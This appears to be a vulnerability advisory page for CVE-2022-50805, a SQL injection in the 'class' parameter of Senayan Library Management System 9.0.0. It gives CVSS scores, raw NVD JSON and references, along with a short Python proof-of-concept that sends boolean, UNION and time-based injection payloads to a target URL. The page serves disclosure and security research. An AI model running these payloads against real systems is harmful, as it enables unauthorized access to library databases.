Security Vulnerability Report
中文
CVE-2022-50805 CVSS 8.2 HIGH

CVE-2022-50805

Published: 2026-01-13 23:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Senayan Library Management System 9.0.0 contains a SQL injection vulnerability in the 'class' parameter that allows attackers to inject malicious SQL queries. Attackers can exploit the vulnerability by submitting crafted payloads to manipulate database queries and potentially extract sensitive information.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Senayan Library Management System (SLIMS) 9.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2022-50805 SQL Injection PoC for SLIMS 9.0.0 # Target: Senayan Library Management System # Vulnerability: SQL Injection in 'class' parameter def exploit_sqli(target_url, payload): """Send SQL injection payload to vulnerable endpoint""" params = { 'class': payload } try: response = requests.get(target_url, params=params, timeout=10) return response.text except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def main(): if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com/index.php") sys.exit(1) target = sys.argv[1] # Basic test payloads payloads = [ "' OR '1'='1", # Basic boolean-based injection "admin' UNION SELECT NULL--", # UNION-based injection "' AND SLEEP(5)--", # Time-based blind injection ] print(f"[*] Target: {target}") print(f"[*] Testing SQL injection payloads...") for payload in payloads: print(f"\n[*] Testing payload: {payload}") result = exploit_sqli(target, payload) if result: print(f"[+] Response received (length: {len(result)})") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50805", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:49.653", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Senayan Library Management System 9.0.0 contains a SQL injection vulnerability in the 'class' parameter that allows attackers to inject malicious SQL queries. Attackers can exploit the vulnerability by submitting crafted payloads to manipulate database queries and potentially extract sensitive information."}, {"lang": "es", "value": "Senayan Library Management System 9.0.0 contiene una vulnerabilidad de inyección SQL en el parámetro 'class' que permite a los atacantes inyectar consultas SQL maliciosas. Los atacantes pueden explotar la vulnerabilidad enviando cargas útiles especialmente diseñadas para manipular consultas de base de datos y potencialmente extraer información sensible."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi", "source": "[email protected]"}, {"url": "https://slims.web.id/web/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51161", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/senayan-library-management-system-sql-injection", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.